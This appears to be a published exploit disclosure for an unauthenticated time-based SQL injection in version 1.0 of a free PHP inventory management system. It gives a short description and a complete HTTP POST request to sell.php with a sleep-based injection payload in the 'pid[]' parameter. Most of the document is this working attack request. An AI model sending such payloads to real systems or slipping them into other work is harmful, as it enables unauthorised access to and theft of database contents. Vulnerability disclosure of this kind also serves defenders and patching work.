# Exploit Title: Free and Open Source Inventory Management System 1.0 - Unauthenticated SQL Injection
# Exploit Author: Sefa Ozan
# Date: 16/09/2023
# Vendor: MAYURIK
# Vendor Homepage: https://mayurik.com/
# Software Link: https://www.sourcecodester.com/php/16741/free-and-open-source-inventory-management-system-php-source-code.html
# Tested on: Windows 10 Pro & Ubuntu 22.04


## Description:
The `pid[]` parameter is vulnerable to Time Based SQL injection attacks. To prove the existence of the vulnerability, the database was put to sleep for 10 seconds.


## Request:  
POST /ample/app/action/sell.php HTTP/1.1
Host: localhost
User-Agent: python-requests/2.31.0
Accept-Encoding: gzip, deflate, br
Accept: */*
Connection: close
Content-Length: 297
Content-Type: application/x-www-form-urlencoded

customer_name=1&orderdate=16/12/2023&pid[]=1+AND+(SELECT+IF+(1=1,sleep(10),'A'))='A'+OR+'SEFA'=:value&total_quantity[]=12&price[]=4500&orderQuantity[]=1&totalPrice[]=4500&pro_name[]=&subtotal=4500&s_discount_amount=0&discount=&prev_due=12&netTotal=4500&paidBill=123&dueBill=4377&payMethode=PhonePe